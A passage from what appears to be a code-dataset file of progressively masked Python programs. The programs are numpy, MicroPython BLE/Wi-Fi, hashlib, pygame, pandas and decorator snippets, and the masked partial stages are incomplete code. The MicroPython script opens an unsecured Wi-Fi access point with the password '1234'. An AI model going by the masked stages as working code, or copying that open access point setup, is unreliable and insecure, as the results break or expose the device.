"step-5": "import numpy as np\n\na = np.ones((3,4))\nb = np.ones((4,1))\n# a.shape = (3,4)\n# b.shape = (4,1)\n\nc = np.zeros_like(a)\n\nfor i in range(3):\n for j in range(4):\n c[i][j] = a[i][j] + b[j]\n\nprint(c)\n\nd = a+b.T\nprint(d)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)
)
for i in addr:
print('{0:x}'.format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'@\xe8\xe7\x85=\xed')):
print('device found')
elif event == _IRQ_SCAN_DONE:
print('scan complete')
pass
<|reserved_special_token_0|>
def onDelete(delBT):
print('onDelete')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
bt.active(True)
<|reserved_special_token_0|>
def byteToMac(addr):
m = memoryview(addr)
a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],
m[2], m[3], m[4], m[5])
return a
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)
)
for i in addr:
print('{0:x}'.format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'@\xe8\xe7\x85=\xed')):
print('device found')
elif event == _IRQ_SCAN_DONE:
print('scan complete')
pass
def onAdd(addBT):
memoryview(addBT)
def onDelete(delBT):
print('onDelete')
bt.irq(handler)
<|reserved_special_token_0|>
ap.active(True)
ap.config(essid='Test', password='1234', authmode=0)
<|reserved_special_token_0|>
while True:
webserver.webserver(s, onAdd, onDelete)
print('scanning soon')
if time.time() - lastscan > 10:
print('scanning now...')
bt.gap_scan(10000)
lastscan = time.time()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
bt = BLE()
bt.active(True)
_IRQ_SCAN_RESULT = const(5)
_IRQ_SCAN_DONE = const(6)
def byteToMac(addr):
m = memoryview(addr)
a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],
m[2], m[3], m[4], m[5])
return a
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)
)
for i in addr:
print('{0:x}'.format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'@\xe8\xe7\x85=\xed')):
print('device found')
elif event == _IRQ_SCAN_DONE:
print('scan complete')
pass
def onAdd(addBT):
memoryview(addBT)
def onDelete(delBT):
print('onDelete')
bt.irq(handler)
ap = network.WLAN(network.AP_IF)
ap.active(True)
ap.config(essid='Test', password='1234', authmode=0)
s = webserver.webserverstart()
lastscan = 0
while True:
webserver.webserver(s, onAdd, onDelete)
print('scanning soon')
if time.time() - lastscan > 10:
print('scanning now...')
bt.gap_scan(10000)
lastscan = time.time()
<|reserved_special_token_1|>
import gc
import network
import lib.gate as gate
import time
from micropython import const
from ubluetooth import BLE
import lib.webserver as webserver
bt = BLE()
bt.active(True)
_IRQ_SCAN_RESULT = const(5)
_IRQ_SCAN_DONE = const(6)
def byteToMac(addr):
m = memoryview(addr)
a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],
m[2], m[3], m[4], m[5])
return a
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)
)
for i in addr:
print('{0:x}'.format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'@\xe8\xe7\x85=\xed')):
print('device found')
elif event == _IRQ_SCAN_DONE:
print('scan complete')
pass
def onAdd(addBT):
memoryview(addBT)
def onDelete(delBT):
print('onDelete')
bt.irq(handler)
ap = network.WLAN(network.AP_IF)
ap.active(True)
ap.config(essid='Test', password='1234', authmode=0)
s = webserver.webserverstart()
lastscan = 0
while True:
webserver.webserver(s, onAdd, onDelete)
print('scanning soon')
if time.time() - lastscan > 10:
print('scanning now...')
bt.gap_scan(10000)
lastscan = time.time()
<|reserved_special_token_1|>
import gc
import network
import lib.gate as gate
import time
from micropython import const
from ubluetooth import BLE
import lib.webserver as webserver
bt = BLE()
bt.active(True)
_IRQ_SCAN_RESULT = const(5)
_IRQ_SCAN_DONE = const(6)
def byteToMac(addr):
m = memoryview(addr)
a = "{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}".format(m[0],m[1],m[2],m[3],m[4],m[5])
return a
def handler(event, data):
if event == _IRQ_SCAN_RESULT:
# A single scan result.
addr_type, addr, adv_type, rssi, adv_data = data
print(addr_type,memoryview(addr) , adv_type, rssi,memoryview( adv_data))
for i in addr:
print("{0:x}".format(i))
print(byteToMac(addr))
if addr == memoryview(bytearray(b'\x40\xe8\xe7\x85\x3d\xed')):
print("device found")
elif event == _IRQ_SCAN_DONE:
# Scan duration finished or manually stopped.
print("scan complete")
pass
def onAdd(addBT):
memoryview(addBT)
def onDelete(delBT):
print("onDelete")
bt.irq(handler)
ap = network.WLAN(network.AP_IF)
ap.active(True)
ap.config(essid="Test", password="1234",authmode= 0)
s = webserver.webserverstart()
lastscan = 0
while True:
webserver.webserver(s, onAdd, onDelete)
print("scanning soon")
if time.time() - lastscan > 10:
print("scanning now...")
bt.gap_scan(10000)
lastscan = time.time()
|
flexible
|
{
"blob_id": "99c60befed32a9aa80b6e66b682d9f475e05a8d1",
"index": 2562,
"step-1": "<mask token>\n\n\ndef handler(event, data):\n if event == _IRQ_SCAN_RESULT:\n addr_type, addr, adv_type, rssi, adv_data = data\n print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)\n )\n for i in addr:\n print('{0:x}'.format(i))\n print(byteToMac(addr))\n if addr == memoryview(bytearray(b'@\\xe8\\xe7\\x85=\\xed')):\n print('device found')\n elif event == _IRQ_SCAN_DONE:\n print('scan complete')\n pass\n\n\n<mask token>\n\n\ndef onDelete(delBT):\n print('onDelete')\n\n\n<mask token>\n",
"step-2": "<mask token>\nbt.active(True)\n<mask token>\n\n\ndef byteToMac(addr):\n m = memoryview(addr)\n a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],\n m[2], m[3], m[4], m[5])\n return a\n\n\ndef handler(event, data):\n if event == _IRQ_SCAN_RESULT:\n addr_type, addr, adv_type, rssi, adv_data = data\n print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)\n )\n for i in addr:\n print('{0:x}'.format(i))\n print(byteToMac(addr))\n if addr == memoryview(bytearray(b'@\\xe8\\xe7\\x85=\\xed')):\n print('device found')\n elif event == _IRQ_SCAN_DONE:\n print('scan complete')\n pass\n\n\ndef onAdd(addBT):\n memoryview(addBT)\n\n\ndef onDelete(delBT):\n print('onDelete')\n\n\nbt.irq(handler)\n<mask token>\nap.active(True)\nap.config(essid='Test', password='1234', authmode=0)\n<mask token>\nwhile True:\n webserver.webserver(s, onAdd, onDelete)\n print('scanning soon')\n if time.time() - lastscan > 10:\n print('scanning now...')\n bt.gap_scan(10000)\n lastscan = time.time()\n",
"step-3": "<mask token>\nbt = BLE()\nbt.active(True)\n_IRQ_SCAN_RESULT = const(5)\n_IRQ_SCAN_DONE = const(6)\n\n\ndef byteToMac(addr):\n m = memoryview(addr)\n a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],\n m[2], m[3], m[4], m[5])\n return a\n\n\ndef handler(event, data):\n if event == _IRQ_SCAN_RESULT:\n addr_type, addr, adv_type, rssi, adv_data = data\n print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)\n )\n for i in addr:\n print('{0:x}'.format(i))\n print(byteToMac(addr))\n if addr == memoryview(bytearray(b'@\\xe8\\xe7\\x85=\\xed')):\n print('device found')\n elif event == _IRQ_SCAN_DONE:\n print('scan complete')\n pass\n\n\ndef onAdd(addBT):\n memoryview(addBT)\n\n\ndef onDelete(delBT):\n print('onDelete')\n\n\nbt.irq(handler)\nap = network.WLAN(network.AP_IF)\nap.active(True)\nap.config(essid='Test', password='1234', authmode=0)\ns = webserver.webserverstart()\nlastscan = 0\nwhile True:\n webserver.webserver(s, onAdd, onDelete)\n print('scanning soon')\n if time.time() - lastscan > 10:\n print('scanning now...')\n bt.gap_scan(10000)\n lastscan = time.time()\n",
"step-4": "import gc\nimport network\nimport lib.gate as gate\nimport time\nfrom micropython import const\nfrom ubluetooth import BLE\nimport lib.webserver as webserver\nbt = BLE()\nbt.active(True)\n_IRQ_SCAN_RESULT = const(5)\n_IRQ_SCAN_DONE = const(6)\n\n\ndef byteToMac(addr):\n m = memoryview(addr)\n a = '{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}'.format(m[0], m[1],\n m[2], m[3], m[4], m[5])\n return a\n\n\ndef handler(event, data):\n if event == _IRQ_SCAN_RESULT:\n addr_type, addr, adv_type, rssi, adv_data = data\n print(addr_type, memoryview(addr), adv_type, rssi, memoryview(adv_data)\n )\n for i in addr:\n print('{0:x}'.format(i))\n print(byteToMac(addr))\n if addr == memoryview(bytearray(b'@\\xe8\\xe7\\x85=\\xed')):\n print('device found')\n elif event == _IRQ_SCAN_DONE:\n print('scan complete')\n pass\n\n\ndef onAdd(addBT):\n memoryview(addBT)\n\n\ndef onDelete(delBT):\n print('onDelete')\n\n\nbt.irq(handler)\nap = network.WLAN(network.AP_IF)\nap.active(True)\nap.config(essid='Test', password='1234', authmode=0)\ns = webserver.webserverstart()\nlastscan = 0\nwhile True:\n webserver.webserver(s, onAdd, onDelete)\n print('scanning soon')\n if time.time() - lastscan > 10:\n print('scanning now...')\n bt.gap_scan(10000)\n lastscan = time.time()\n",
"step-5": "import gc\r\nimport network\r\nimport lib.gate as gate\r\nimport time\r\nfrom micropython import const\r\nfrom ubluetooth import BLE\r\nimport lib.webserver as webserver\r\n\r\nbt = BLE()\r\nbt.active(True)\r\n\r\n_IRQ_SCAN_RESULT = const(5)\r\n_IRQ_SCAN_DONE = const(6)\r\n\r\ndef byteToMac(addr):\r\n m = memoryview(addr)\r\n a = \"{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}:{:0>2X}\".format(m[0],m[1],m[2],m[3],m[4],m[5])\r\n return a \r\n\r\ndef handler(event, data):\r\n if event == _IRQ_SCAN_RESULT:\r\n # A single scan result.\r\n addr_type, addr, adv_type, rssi, adv_data = data\r\n print(addr_type,memoryview(addr) , adv_type, rssi,memoryview( adv_data))\r\n for i in addr:\r\n print(\"{0:x}\".format(i))\r\n \r\n print(byteToMac(addr))\r\n if addr == memoryview(bytearray(b'\\x40\\xe8\\xe7\\x85\\x3d\\xed')):\r\n print(\"device found\")\r\n elif event == _IRQ_SCAN_DONE:\r\n # Scan duration finished or manually stopped.\r\n print(\"scan complete\")\r\n pass\r\n\r\ndef onAdd(addBT):\r\n memoryview(addBT)\r\n\r\ndef onDelete(delBT):\r\n print(\"onDelete\")\r\n\r\nbt.irq(handler)\r\n\r\nap = network.WLAN(network.AP_IF)\r\nap.active(True)\r\nap.config(essid=\"Test\", password=\"1234\",authmode= 0)\r\n\r\ns = webserver.webserverstart()\r\n\r\nlastscan = 0\r\nwhile True:\r\n webserver.webserver(s, onAdd, onDelete)\r\n print(\"scanning soon\")\r\n if time.time() - lastscan > 10:\r\n print(\"scanning now...\")\r\n bt.gap_scan(10000) \r\n lastscan = time.time()\r\n \r\n\r\n \r\n",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
import hashlib
def md5_hexdigest(data):
return hashlib.md5(data.encode('utf-8')).hexdigest()
def sha1_hexdigest(data):
return hashlib.sha1(data.encode('utf-8')).hexdigest()
def sha224_hexdigest(data):
return hashlib.sha224(data.encode('utf-8')).hexdigest()
def sha256_hexdigest(data):
return hashlib.sha256(data.encode('utf-8')).hexdigest()
def sha384_hexdigest(data):
return hashlib.sha384(data.encode('utf-8')).hexdigest()
def sha512_hexdigest(data):
return hashlib.sha512(data.encode('utf-8')).hexdigest()
|
normal
|
{
"blob_id": "35a95c49c2dc09b528329433a157cf313cf59667",
"index": 8955,
"step-1": "<mask token>\n\n\ndef md5_hexdigest(data):\n return hashlib.md5(data.encode('utf-8')).hexdigest()\n\n\ndef sha1_hexdigest(data):\n return hashlib.sha1(data.encode('utf-8')).hexdigest()\n\n\ndef sha224_hexdigest(data):\n return hashlib.sha224(data.encode('utf-8')).hexdigest()\n\n\n<mask token>\n\n\ndef sha384_hexdigest(data):\n return hashlib.sha384(data.encode('utf-8')).hexdigest()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef md5_hexdigest(data):\n return hashlib.md5(data.encode('utf-8')).hexdigest()\n\n\ndef sha1_hexdigest(data):\n return hashlib.sha1(data.encode('utf-8')).hexdigest()\n\n\ndef sha224_hexdigest(data):\n return hashlib.sha224(data.encode('utf-8')).hexdigest()\n\n\ndef sha256_hexdigest(data):\n return hashlib.sha256(data.encode('utf-8')).hexdigest()\n\n\ndef sha384_hexdigest(data):\n return hashlib.sha384(data.encode('utf-8')).hexdigest()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef md5_hexdigest(data):\n return hashlib.md5(data.encode('utf-8')).hexdigest()\n\n\ndef sha1_hexdigest(data):\n return hashlib.sha1(data.encode('utf-8')).hexdigest()\n\n\ndef sha224_hexdigest(data):\n return hashlib.sha224(data.encode('utf-8')).hexdigest()\n\n\ndef sha256_hexdigest(data):\n return hashlib.sha256(data.encode('utf-8')).hexdigest()\n\n\ndef sha384_hexdigest(data):\n return hashlib.sha384(data.encode('utf-8')).hexdigest()\n\n\ndef sha512_hexdigest(data):\n return hashlib.sha512(data.encode('utf-8')).hexdigest()\n",
"step-4": "import hashlib\n\n\ndef md5_hexdigest(data):\n return hashlib.md5(data.encode('utf-8')).hexdigest()\n\n\ndef sha1_hexdigest(data):\n return hashlib.sha1(data.encode('utf-8')).hexdigest()\n\n\ndef sha224_hexdigest(data):\n return hashlib.sha224(data.encode('utf-8')).hexdigest()\n\n\ndef sha256_hexdigest(data):\n return hashlib.sha256(data.encode('utf-8')).hexdigest()\n\n\ndef sha384_hexdigest(data):\n return hashlib.sha384(data.encode('utf-8')).hexdigest()\n\n\ndef sha512_hexdigest(data):\n return hashlib.sha512(data.encode('utf-8')).hexdigest()\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
#!/usr/bin/env python
import pygame
import pygame.mixer as mixer
def pre_init():
mixer.pre_init(22050, -16, 2, 2048)
def init():
mixer.init()
pygame.mixer.set_num_channels(16)
def deinit():
mixer.quit()
class Music (object):
our_music_volume = 0.8
our_current_music = None
def __init__( self, filename = None ):
self.sound = None
self.channel = None
if filename is not None:
self.load( filename )
def load( self, filename ):
self.sound = mixer.Sound( filename )
def play( self, loop = -1 ):
self.sound.set_volume( Music.our_music_volume )
self.channel = self.sound.play( loop )
Music.our_current_music = self.sound
def stop( self ):
self.sound.stop()
def fadeout( self, millisec ):
self.sound.fadeout( millisec )
def is_playing( self ):
return self.channel is not None and self.channel.get_sound() is self.sound
@staticmethod
def set_global_volume( volume ):
assert volume >= 0.0
assert volume <= 1.0
Music.our_music_volume = volume
if Music.our_current_music is not None:
Music.our_current_music.set_volume( volume )
@staticmethod
def get_global_volume():
return Music.our_music_volume
class Sound (object):
our_sound_volume = 0.8
def __init__( self, filename = None ):
self.sound = None
self.channel = None
if filename is not None:
self.load( filename )
def load( self, filename ):
self.sound = mixer.Sound( filename )
def play( self, loop = 0 ):
"""for infiniteloop, set loop to -1"""
self.sound.set_volume( Sound.our_sound_volume )
self.channel = self.sound.play( loop )
def stop( self ):
self.sound.stop()
def fadeout( self, millisec ):
self.sound.fadeout( millisec )
def is_playing( self ):
return self.channel is not None and self.channel.get_sound() is self.sound
@staticmethod
def set_global_volume( volume ):
assert volume >= 0.0
assert volume <= 1.0
Sound.our_sound_volume = volume
@staticmethod
def get_global_volume():
return Sound.our_sound_volume
|
normal
|
{
"blob_id": "2caea9e7bbef99b19ba917995513413385c7abdf",
"index": 9808,
"step-1": "<mask token>\n\n\nclass Music(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n\n\nclass Sound(object):\n our_sound_volume = 0.8\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=0):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume(Sound.our_sound_volume)\n self.channel = self.sound.play(loop)\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n",
"step-2": "<mask token>\n\n\nclass Music(object):\n <mask token>\n <mask token>\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=-1):\n self.sound.set_volume(Music.our_music_volume)\n self.channel = self.sound.play(loop)\n Music.our_current_music = self.sound\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n <mask token>\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Music.our_music_volume = volume\n if Music.our_current_music is not None:\n Music.our_current_music.set_volume(volume)\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n\n\nclass Sound(object):\n our_sound_volume = 0.8\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=0):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume(Sound.our_sound_volume)\n self.channel = self.sound.play(loop)\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n",
"step-3": "<mask token>\n\n\ndef deinit():\n mixer.quit()\n\n\nclass Music(object):\n our_music_volume = 0.8\n our_current_music = None\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=-1):\n self.sound.set_volume(Music.our_music_volume)\n self.channel = self.sound.play(loop)\n Music.our_current_music = self.sound\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Music.our_music_volume = volume\n if Music.our_current_music is not None:\n Music.our_current_music.set_volume(volume)\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n\n\nclass Sound(object):\n our_sound_volume = 0.8\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=0):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume(Sound.our_sound_volume)\n self.channel = self.sound.play(loop)\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n",
"step-4": "import pygame\nimport pygame.mixer as mixer\n\n\ndef pre_init():\n mixer.pre_init(22050, -16, 2, 2048)\n\n\ndef init():\n mixer.init()\n pygame.mixer.set_num_channels(16)\n\n\ndef deinit():\n mixer.quit()\n\n\nclass Music(object):\n our_music_volume = 0.8\n our_current_music = None\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=-1):\n self.sound.set_volume(Music.our_music_volume)\n self.channel = self.sound.play(loop)\n Music.our_current_music = self.sound\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Music.our_music_volume = volume\n if Music.our_current_music is not None:\n Music.our_current_music.set_volume(volume)\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n\n\nclass Sound(object):\n our_sound_volume = 0.8\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=0):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume(Sound.our_sound_volume)\n self.channel = self.sound.play(loop)\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n",
"step-5": "#!/usr/bin/env python\n\nimport pygame\nimport pygame.mixer as mixer\n\ndef pre_init():\n mixer.pre_init(22050, -16, 2, 2048)\n\ndef init():\n mixer.init()\n pygame.mixer.set_num_channels(16)\n\ndef deinit():\n mixer.quit()\n\n\nclass Music (object):\n our_music_volume = 0.8\n our_current_music = None\n \n def __init__( self, filename = None ):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load( filename )\n\n def load( self, filename ):\n self.sound = mixer.Sound( filename )\n\n def play( self, loop = -1 ):\n self.sound.set_volume( Music.our_music_volume )\n self.channel = self.sound.play( loop )\n Music.our_current_music = self.sound\n \n def stop( self ):\n self.sound.stop()\n\n def fadeout( self, millisec ):\n self.sound.fadeout( millisec )\n\n def is_playing( self ):\n return self.channel is not None and self.channel.get_sound() is self.sound\n\n @staticmethod\n def set_global_volume( volume ):\n assert volume >= 0.0\n assert volume <= 1.0\n\n Music.our_music_volume = volume\n\n if Music.our_current_music is not None:\n Music.our_current_music.set_volume( volume )\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n \n\nclass Sound (object):\n our_sound_volume = 0.8\n \n def __init__( self, filename = None ):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load( filename )\n\n def load( self, filename ):\n self.sound = mixer.Sound( filename )\n\n def play( self, loop = 0 ):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume( Sound.our_sound_volume )\n self.channel = self.sound.play( loop )\n \n def stop( self ):\n self.sound.stop()\n\n def fadeout( self, millisec ):\n self.sound.fadeout( millisec )\n\n def is_playing( self ):\n return self.channel is not None and self.channel.get_sound() is self.sound\n\n @staticmethod\n def set_global_volume( volume ):\n assert volume >= 0.0\n assert volume <= 1.0\n\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n \n",
"step-ids": [
12,
18,
21,
24,
25
]
}
|
[
12,
18,
21,
24,
25
] |
import pandas as pd
import numpy as np
class LabeledArray:
@staticmethod
def get_label_for_indexes_upto(input_data, input_label, input_index):
df_input_data = pd.DataFrame(input_data)
df_labels = pd.DataFrame(input_label)
df_data_labels = pd.concat([df_input_data, df_labels], axis=1)
df_data_labels.columns = ['input_data', 'input_label']
df_data_labels.sort_values(by=['input_data'], ascending=True,
inplace=True)
return np.array(df_data_labels.iloc[:, 1].head(input_index))
|
normal
|
{
"blob_id": "0dea8675d8050a91c284a13bcbce6fd0943b604e",
"index": 5135,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LabeledArray:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LabeledArray:\n\n @staticmethod\n def get_label_for_indexes_upto(input_data, input_label, input_index):\n df_input_data = pd.DataFrame(input_data)\n df_labels = pd.DataFrame(input_label)\n df_data_labels = pd.concat([df_input_data, df_labels], axis=1)\n df_data_labels.columns = ['input_data', 'input_label']\n df_data_labels.sort_values(by=['input_data'], ascending=True,\n inplace=True)\n return np.array(df_data_labels.iloc[:, 1].head(input_index))\n",
"step-4": "import pandas as pd\nimport numpy as np\n\n\nclass LabeledArray:\n\n @staticmethod\n def get_label_for_indexes_upto(input_data, input_label, input_index):\n df_input_data = pd.DataFrame(input_data)\n df_labels = pd.DataFrame(input_label)\n df_data_labels = pd.concat([df_input_data, df_labels], axis=1)\n df_data_labels.columns = ['input_data', 'input_label']\n df_data_labels.sort_values(by=['input_data'], ascending=True,\n inplace=True)\n return np.array(df_data_labels.iloc[:, 1].head(input_index))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def is_huge(A, B):
return A[0] > B[0] and A[1] > B[1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def is_huge(A, B):
return A[0] > B[0] and A[1] > B[1]
if __name__ == '__main__':
bulks = []
num = int(sys.stdin.readline())
for i in range(num):
bulks.append(list(map(int, sys.stdin.readline().split())))
for i in range(len(bulks)):
count = 0
for j in range(len(bulks)):
if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):
count += 1
if count == 0:
print(1, end=' ')
else:
print(count + 1, end=' ')
<|reserved_special_token_1|>
import sys
def is_huge(A, B):
return A[0] > B[0] and A[1] > B[1]
if __name__ == '__main__':
bulks = []
num = int(sys.stdin.readline())
for i in range(num):
bulks.append(list(map(int, sys.stdin.readline().split())))
for i in range(len(bulks)):
count = 0
for j in range(len(bulks)):
if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):
count += 1
if count == 0:
print(1, end=' ')
else:
print(count + 1, end=' ')
<|reserved_special_token_1|>
import sys
def is_huge(A, B):
return (A[0] > B[0]) and (A[1] > B[1])
if __name__ == '__main__':
bulks = []
num = int(sys.stdin.readline())
for i in range(num):
bulks.append(list(map(int, sys.stdin.readline().split())))
for i in range(len(bulks)):
count = 0
for j in range(len(bulks)):
if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):
count += 1
if count == 0:
print(1, end=" ")
else:
print(count+1, end=" ")
|
flexible
|
{
"blob_id": "5dc8f420e16ee14ecfdc61413f10a783e819ec32",
"index": 506,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef is_huge(A, B):\n return A[0] > B[0] and A[1] > B[1]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef is_huge(A, B):\n return A[0] > B[0] and A[1] > B[1]\n\n\nif __name__ == '__main__':\n bulks = []\n num = int(sys.stdin.readline())\n for i in range(num):\n bulks.append(list(map(int, sys.stdin.readline().split())))\n for i in range(len(bulks)):\n count = 0\n for j in range(len(bulks)):\n if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):\n count += 1\n if count == 0:\n print(1, end=' ')\n else:\n print(count + 1, end=' ')\n",
"step-4": "import sys\n\n\ndef is_huge(A, B):\n return A[0] > B[0] and A[1] > B[1]\n\n\nif __name__ == '__main__':\n bulks = []\n num = int(sys.stdin.readline())\n for i in range(num):\n bulks.append(list(map(int, sys.stdin.readline().split())))\n for i in range(len(bulks)):\n count = 0\n for j in range(len(bulks)):\n if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):\n count += 1\n if count == 0:\n print(1, end=' ')\n else:\n print(count + 1, end=' ')\n",
"step-5": "import sys\n\n\ndef is_huge(A, B):\n return (A[0] > B[0]) and (A[1] > B[1])\n\n\nif __name__ == '__main__':\n bulks = []\n num = int(sys.stdin.readline())\n for i in range(num):\n bulks.append(list(map(int, sys.stdin.readline().split())))\n\n for i in range(len(bulks)):\n count = 0\n for j in range(len(bulks)):\n if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):\n count += 1\n\n if count == 0:\n print(1, end=\" \")\n else:\n print(count+1, end=\" \")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@h1_wrap
def say_hi(name):
return 'Hello, ' + name.capitalize()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def h1_wrap(func):
def func_wrapper(param):
return '<h1>' + func(param) + '</h1>'
return func_wrapper
@h1_wrap
def say_hi(name):
